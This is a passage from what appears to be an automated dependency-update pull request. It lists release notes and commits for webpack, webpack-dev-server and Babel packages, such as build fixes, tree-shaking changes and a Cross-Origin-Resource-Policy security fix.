href=\"https://redirect.github.com/webpack/webpack/pull/21015\"\u003e#21015\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eReduce peak memory of \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e on large builds (closes \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20961\"\u003e#20961\u003c/a\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20963\"\u003e#20963\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix slow \u003ccode\u003erequire.context()\u003c/code\u003e / dynamic \u003ccode\u003eimport()\u003c/code\u003e rebuilds in watch mode (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/13636\"\u003e#13636\u003c/a\u003e). When a file inside a watched context directory changed, \u003ccode\u003eNodeWatchFileSystem\u003c/code\u003e would call \u003ccode\u003einputFileSystem.purge(contextDir)\u003c/code\u003e. The enhanced-resolve \u003ccode\u003epurge\u003c/code\u003e implementation matches cache keys with \u003ccode\u003ekey.startsWith(contextDir)\u003c/code\u003e, so the stat cache of every file under the directory was discarded on every rebuild — \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e then re-\u003ccode\u003estat\u003c/code\u003e-ed the whole tree on each rebuild. Single-file rebuilds on a 4000-file context now reuse the warm stat cache, dropping median rebuild from ~1260 ms to ~650 ms in a local reproduction (≈49%). For directory items that are explicitly watched contexts, \u003ccode\u003epurge\u003c/code\u003e is now called with \u003ccode\u003e{ exact: true }\u003c/code\u003e (added in \u003ccode\u003eenhanced-resolve@5.22.0\u003c/code\u003e) so only the directory's own entry is invalidated; file-level changes in the same aggregated event continue to purge file stats and the parent \u003ccode\u003ereaddir\u003c/code\u003e as before. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.107.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAlign the experimental HTML tokenizer with the WHATWG spec: fix offset-range bugs in the script-data, content-mode end-tag, attribute-value, and EOF states; surface tokenizer parse errors to consumers via a new \u003ccode\u003eparseError\u003c/code\u003e callback (\u003ccode\u003e\u0026quot;warning\u0026quot;\u003c/code\u003e when the tokenizer recovers and the emitted token is still well-formed, \u003ccode\u003e\u0026quot;error\u0026quot;\u003c/code\u003e when the offset range is incomplete — e.g. \u003ccode\u003eeof-in-tag\u003c/code\u003e); and add the full WHATWG named character references table so \u003ccode\u003edecodeHtmlEntities\u003c/code\u003e handles all named entities (including legacy bare forms like \u003ccode\u003e\u0026amp;AMP\u003c/code\u003e and multi-code-point entities like \u003ccode\u003e\u0026amp;NotEqualTilde;\u003c/code\u003e) with proper longest-prefix backtracking. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21000\"\u003e#21000\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eTree-shake CommonJS modules imported through a \u003ccode\u003econst NAME = require(LITERAL)\u003c/code\u003e binding when only static members of \u003ccode\u003eNAME\u003c/code\u003e are read. Previously webpack treated every export of such modules as referenced (because the bare \u003ccode\u003erequire()\u003c/code\u003e dependency reports \u003ccode\u003eEXPORTS_OBJECT_REFERENCED\u003c/code\u003e), so unused \u003ccode\u003eexports.x = ...\u003c/code\u003e assignments remained in the bundle even with \u003ccode\u003eusedExports\u003c/code\u003e enabled. The parser now forwards \u003ccode\u003eNAME.x\u003c/code\u003e / \u003ccode\u003eNAME.x()\u003c/code\u003e / \u003ccode\u003eNAME[\u0026quot;x\u0026quot;]\u003c/code\u003e accesses to the underlying \u003ccode\u003eCommonJsRequireDependency\u003c/code\u003e as referenced exports, falling back to the full exports object the moment \u003ccode\u003eNAME\u003c/code\u003e is read in any other context (passed by value, destructured later, accessed with a dynamic key, …). This brings the binding form to parity with the existing destructuring form (\u003ccode\u003econst { x } = require(...)\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21003\"\u003e#21003\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eRangeError: Maximum call stack size exceeded\u003c/code\u003e thrown from \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e on long linear chains of side-effect-free imports. \u003ccode\u003eNormalModule.getSideEffectsConnectionState\u003c/code\u003e previously descended through \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e recursively, adding two stack frames per module, which overflowed V8's stack at a few thousand modules deep. The traversal is now iterative. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20993\"\u003e#20993\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eNormalModuleFactory\u003c/code\u003e parser/generator types: (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20999\"\u003e#20999\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emodule.generator.html\u003c/code\u003e now uses \u003ccode\u003eHtmlGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e (the \u003ccode\u003eextract\u003c/code\u003e option was hidden from the \u003ccode\u003ecreateGenerator\u003c/code\u003e / \u003ccode\u003egenerator\u003c/code\u003e hook types).\u003c/li\u003e\n\u003cli\u003eWebAssembly (\u003ccode\u003ewebassembly/async\u003c/code\u003e, \u003ccode\u003ewebassembly/sync\u003c/code\u003e) generator hooks now use \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyParserOptions\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleFactory#getParser\u003c/code\u003e / \u003ccode\u003ecreateParser\u003c/code\u003e / \u003ccode\u003egetGenerator\u003c/code\u003e / \u003ccode\u003ecreateGenerator\u003c/code\u003e are now generic over the module-type string, returning the specific parser/generator class for known types (e.g. \u003ccode\u003eJavascriptParser\u003c/code\u003e for \u003ccode\u003e\u0026quot;javascript/auto\u0026quot;\u003c/code\u003e, \u003ccode\u003eCssGenerator\u003c/code\u003e for \u003ccode\u003e\u0026quot;css\u0026quot;\u003c/code\u003e, etc.) instead of always returning the base \u003ccode\u003eParser\u003c/code\u003e / \u003ccode\u003eGenerator\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleCreateData\u003c/code\u003e is now generic over the module type so \u003ccode\u003eparser\u003c/code\u003e, \u003ccode\u003eparserOptions\u003c/code\u003e, \u003ccode\u003egenerator\u003c/code\u003e, and \u003ccode\u003egeneratorOptions\u003c/code\u003e are narrowed to the specific class / options for the given \u003ccode\u003etype\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eLink import bindings used inside \u003ccode\u003edefine(...)\u003c/code\u003e callbacks in ES modules. Previously, \u003ccode\u003eHarmonyDetectionParserPlugin\u003c/code\u003e skipped walking the arguments of \u003ccode\u003edefine\u003c/code\u003e calls in harmony modules, so references to imported bindings inside an inline AMD \u003ccode\u003edefine\u003c/code\u003e factory (e.g. \u003ccode\u003edefine(function () { console.log(foo); })\u003c/code\u003e) were not rewritten to their imported references and could cause \u003ccode\u003eReferenceError\u003c/code\u003e at runtime. Inner graph usage analysis is also fixed for the related pattern \u003ccode\u003econst fn = function () { foo; }; define(fn);\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20990\"\u003e#20990\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eHTML-entry pipeline (\u003ccode\u003eexperiments.html\u003c/code\u003e + \u003ccode\u003eexperiments.css\u003c/code\u003e): emit \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot;\u0026gt;\u003c/code\u003e tags for CSS chunks reachable from a \u003ccode\u003e\u0026lt;script src\u0026gt;\u003c/code\u003e entry. Previously when the bundled JS imported CSS, the resulting \u003ccode\u003e.css\u003c/code\u003e file was emitted to disk but never referenced from the extracted HTML (no \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tag), and when \u003ccode\u003esplitChunks\u003c/code\u003e extracted CSS into sibling chunks the HTML cloned the originating \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e for each one — producing \u003ccode\u003e\u0026lt;script src=\u0026quot;style.js\u0026quot;\u0026gt;\u003c/code\u003e pointing at non-existent JS filenames instead of \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot; href=\u0026quot;style.css\u0026quot;\u0026gt;\u003c/code\u003e. CSS chunks are now sorted by the entrypoint's module post-order index so the \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tags also appear in source import order, fixing the cascade ordering issue documented in \u003ccode\u003ehtml-webpack-plugin#1838\u003c/code\u003e and \u003ccode\u003ewebpack/mini-css-extract-plugin#959\u003c/code\u003e for HTML-entry builds. \u003ccode\u003enonce\u003c/code\u003e/\u003ccode\u003ecrossorigin\u003c/code\u003e/\u003ccode\u003ereferrerpolicy\u003c/code\u003e are copied from the originating tag onto the emitted \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21002\"\u003e#21002\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/cfb24a4af6ea68034b25f80e14f95aaeaad6d596\"\u003e\u003ccode\u003ecfb24a4\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21019\"\u003e#21019\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c7d8a3a7f411dd9910cf66ef0d09a3a1bf6686bd\"\u003e\u003ccode\u003ec7d8a3a\u003c/code\u003e\u003c/a\u003e fix: release per-child Compilation heap pressure in MultiCompiler (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21015\"\u003e#21015\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/d6cdebe5e67008cfd717953634449ad283fd0334\"\u003e\u003ccode\u003ed6cdebe\u003c/code\u003e\u003c/a\u003e fix: regression in types for ProgressPlugin (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21036\"\u003e#21036\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c07389012566fe5d2cb56bd64ee76fb185a1bbb2\"\u003e\u003ccode\u003ec073890\u003c/code\u003e\u003c/a\u003e fix: gap-fill entryOptions when an async block reuses an existing entrypoint ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/78158f087641803b7b5b20296b729861cdef7840\"\u003e\u003ccode\u003e78158f0\u003c/code\u003e\u003c/a\u003e docs: streamline AGENTS.md to reduce AI hallucination (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21033\"\u003e#21033\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c61c6499cc0b89ddbfc52a96cd4be081fb530d0f\"\u003e\u003ccode\u003ec61c649\u003c/code\u003e\u003c/a\u003e test: fail on missing per-kind snapshot instead of auto-writing it (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21027\"\u003e#21027\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/a514897fcac61b8bc7aa13e32fae456bffdcd080\"\u003e\u003ccode\u003ea514897\u003c/code\u003e\u003c/a\u003e docs: update examples (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21031\"\u003e#21031\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/cc4035b460ff15065af52360cb40baad4fbb8851\"\u003e\u003ccode\u003ecc4035b\u003c/code\u003e\u003c/a\u003e fix: remove unnecessary \u003cstrong\u003ewebpack_require\u003c/strong\u003e in ESM library output (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21032\"\u003e#21032\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/12cb8251190cd481d78ea4252d652e75b0427f42\"\u003e\u003ccode\u003e12cb825\u003c/code\u003e\u003c/a\u003e docs(buildChunkGraph): explain why blocksWithNestedBlocks gates the skip (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21\"\u003e#21\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/75f60f6b7f25b70d25aaf5cfa55d212b7a845120\"\u003e\u003ccode\u003e75f60f6\u003c/code\u003e\u003c/a\u003e fix(ConcatenatedModule): include runtimeCondition of external infos in update...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.105.4...v5.107.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.3 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/core` from 7.29.0 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/04ea6b27fdac8f40c3481aec2080ac9678779509\"\u003e\u003ccode\u003e04ea6b2\u003c/code\u003e\u003c/a\u003e v7.29.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99f498a9b9fa0b900d603fbe8f6601bb3b9e42bb\"\u003e\u003ccode\u003e99f498a\u003c/code\u003e\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/18001\"\u003e#18001\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/feba0a3654c596bd369d1ef1231f5d56666d56dc\"\u003e\u003ccode\u003efeba0a3\u003c/code\u003e\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17998\"\u003e#17998\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-core\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/preset-env` from 7.29.2 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/preset-env's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca 